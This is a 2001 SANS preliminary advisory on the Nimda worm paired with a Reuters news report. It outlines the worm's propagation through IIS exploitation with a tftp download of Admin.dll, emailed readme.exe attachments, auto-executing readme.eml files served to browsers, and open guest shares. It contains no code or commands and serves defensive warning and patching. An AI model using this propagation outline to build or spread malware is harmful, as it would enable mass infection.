New IIS "Concept Virus" Worm: NIMDA Propagating Quickly
Editor's Note: Perhaps the scariest aspect of this particular worm is its reported ability to
infect users who simply view a webpage with Microsoft's Internet Explorer on an infected
server.
SANS Institute release:
Nimda Worm
Version 0.1 - September 18, 2001
New IIS "Concept Virus" Worm: NIMDA Propagating Quickly
UPDATE SUMMARY: A new worm that has been named "Nimda" is propagating with unprecedented speed
across the Internet. The worm appears to have at least four distinct propagation mechanisms.
****INFORMATION IS PRELIMINARY****
(1) An IIS vulnerability propagation mechanism where the worm
attempts to exploit a large number of IIS vulnerabilities to gain
control of a victim IIS server. Once in control, the worm uses tftp
to fetch its code in a file called Admin.dll from the attacking server.
(2) The worm harvests email addresses from the address book and
potentially the web browser history and sends itself to all addresses
as an attachment called readme.exe. Note that the worm may spoof
the source address on the emails, some have even been received at
incidents.org with source addresses of codered@sans.org and
webmaster@incidents.org. Other reports indicate that the
spoofed source address of staff@attrition.org has also been seen.
It is possible that someone is spoofing these emails intentionally,
so that people will trust the source addresses as they are security
sites.
(3) When a web server is infected, the worm downloads a binary
encoded as a wav file to each client that connects to the server.
The wav file is called readme.eml. Microsoft Internet Explorer will
automatically execute the malicious file.
(4) The worm is network aware and propagates via open shares. It
will propagate to shares that are accessible to username guest
with no password.
The worm appears to prefer to target its neighbors, Code Red II
style, when scanning for vulnerable IIS servers. This can cause
considerable activity on local networks that have several
infected machines.
...
Evidently, a new worm is the source of the activity. Once the
worm gains access to a vulnerable IIS webserver, it uses tftp to
fetch a binary called Admin.dll from the infecting host.
...
Also, connecting to an infected webserver using a web
browser results in a attempt to download an executable called
readme.eml. Reports indicate that IE5 will automatically
execute the program, which appears to be mime encoded as a
wav file. The worm forces readme.eml to be sent to each client
that accesses any page on the infected webserver.
...
Other reports indicate that the worm will email itself to addresses in the
victim machine's address book as an attachment called readme.exe. Further,
the worm appears to be harvesting email addresses from cached web pages.
An example of the subject line of an email carrying the malicious readme.exe
program is below:
-------------
From: infected, infected@infected.com
Subject: Øò^Rdesktopdesktopsamplesampledesktopsampledesktopsamplesampledesktop
desktopdesktopdesktopsampledesktopdesktopsampledesktopdesktopdesktop
sampledesktopdesktopsampledesktopsampledesktopsampledesktopsampl
To: recipient, recipient@recipient.org
----------------
The worm is also said to propagate via open network shares or
shares that allow connections via the username guest with no password.
All files are currently under analysis. This information is preliminary.
More information will be posted as soon as it becomes available.
Tom Liston has posted some preliminary analysis here:
http://www.incidents.org/archives/intrusions/msg01765.html
Links to AV vendor sites on the topic are here:
Sophos
http://www.sophos.com/virusinfo/analyses/w32nimdaa.html
NAI
http://vil.nai.com/vil/virusSummary.asp?virus_k=99209
F-Secure
http://www.f-secure.com/v-descs/nimda.shtml
Symantec
http://www.sarc.com/avcenter/venc/data/w32.nimda.a@mm.html
To read more technical information about this issue, please see: http://www.incidents.org/react/nimda.php
Also see: http://www.nipc.gov/warnings/advisories/2001/01-022.htm
------------------------------------------
Nimda Computer Worm Hits Worldwide
Updated: Tue, Sep 18 4:33 PM EDT
By Duncan Martell
SAN FRANCISCO (Reuters) - A damaging new computer worm was spreading like wildfire across the Internet on Tuesday, hitting both home PC users and commercial servers, in an outbreak that could prove more widespread and costly than the Code Red viruses, computer security experts said.
Known as "Nimda," which spells admin backwards, the worm spreads by sending infected e-mails and also appears able to infect Web sites, so when a user visits a compromised Web site, the browser -- if it has not been patched -- can spread the worm to a PC, analysts said.
So far, it appears that Nimda arrives in e-mail without a subject line and containing an attachment titled "readme.exe," experts said.
Internet security experts have warned of the potential for an increase in virus activity after last week's attacks on the World Trade Center and Pentagon, but U.S. Attorney General John Ashcroft said there was no sign the outbreak was linked to those events.
"There is no evidence at this time which links this infection to the terrorist attacks of last week," Ashcroft told a news briefing.
The worm may have started as early as Monday and was showing signs of overloading traffic on the Internet, Ashcroft said, saying that Nimda proved "heavier" than the Code Red worm that caused an estimated $2.6 billion in clean-up costs on Internet-linked computers after outbreaks in July and August.
"Compared to Code Red, it may well be bigger simply because it can affect home users as well," said Graham Cluley, senior technical consultant for Sophos Antivirus.
If Microsoft Corp.'s Outlook e-mail program has not been patched with an update that became available in March, the recipient does not even need to open the attachment to activate the virus -- opening the e-mail itself is sufficient -- said Vincent Weafer, senior director of Symantec Corp.'s Symantec Security Response unit.
Other e-mail programs, such as Eudora or International Business Machine Corp.'s Lotus Notes, require the recipient to open the attachment for the virus to replicate, he said.
So far, the malicious program does not appear capable of erasing files or data, but Nimda has shown itself capable of slowing down computer operations as it replicates, experts said.
"In terms of data destruction, we haven't seen anything," Weafer said.
Experts said Nimda had appeared in the United States, Europe and Latin America and was likely to spread to other regions as well.
"It seems to be very widespread and (moves) at an incredibly quick rate," Cluley said. "The reason it's become so widespread is because it not only travels via e-mail but it contaminates Web sites as well."
The worm exploits an already detected vulnerability in Microsoft's Internet Information Server Web software running on Windows NT or 2000 machines, the same breach that the Code Red viruses exploited, experts said.
Once Nimda infects a machine, it tries to replicate in three ways. It has its own e-mail engine and will try to send itself out using addresses stored in e-mail programs. It also scans IIS servers looking for the known vulnerability and attacks those servers. Finally, it looks for shared disk drives and tries to replicate itself to those devices, Symantec's Weafer said.
Experts urged companies and users to update antivirus software and to download the software patches, noting the principal reason the worm had spread so quickly was that people and companies had not downloaded the free software patches.
Patches are available for both the IIS vulnerability and Web browsers at http://www.microsoft.com/security.
Source: http://news.excite.com/news/r/010918/16/news-tech-worm-dc
